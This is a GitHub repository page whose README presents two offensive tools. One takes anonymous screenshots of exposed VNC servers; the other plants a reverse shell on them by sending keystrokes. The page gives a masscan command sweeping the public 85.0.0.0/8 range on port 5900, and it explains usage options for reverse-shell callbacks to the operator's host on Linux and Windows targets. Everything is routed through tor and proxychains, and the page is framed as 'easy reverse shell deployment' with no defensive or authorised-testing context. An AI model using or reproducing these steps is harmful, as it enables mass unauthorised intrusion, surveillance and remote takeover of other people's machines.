Skip to content

whitewhidow/vncshooter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 

Repository files navigation

vncshooter & vncshitter

vncshooter will parse a textfile, extract all ip's, attempt to connect to the target via a vnc connection and anonymously take a screenshot. (requires tor, proxychains, vncsnapshot)

vncshitter can automatically place a reverse shell on a target, by anonymously sending keystrokes over a vnc connection (requires tor, proxychains, vncdotool)

use masscan to gather target ip's

sudo masscan -p5900 85.0.0.0/8 --resume paused.conf --rate 10000 >> 85.output

use vncshooter to take screens

./vncshooter 85.output

use vncshitter to deploy a shell

Usage: ./vncshitter --rhost=x.x.x.x [--rport=5900] [--lhost=x.x.x.x] [--rport=4444] [--platform=linux-gui]

[rhost] = Remote ip (required)
[rport] = Remote port (default: 5900)
[lhost] = Local host to bind default shell to (default: your external ip)
[lport] = Local port to bind default shell to (default: 4444)
[platform] = (default: linux-gui)
             linux-gui: will work on default ubuntu etc (using alt+ctrl+t -> terminal -> payload)
             win: will work on win7+ (using windows_key+r -> run -> cmd -> payload)

About

easy reverse shell deployment over vnc

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages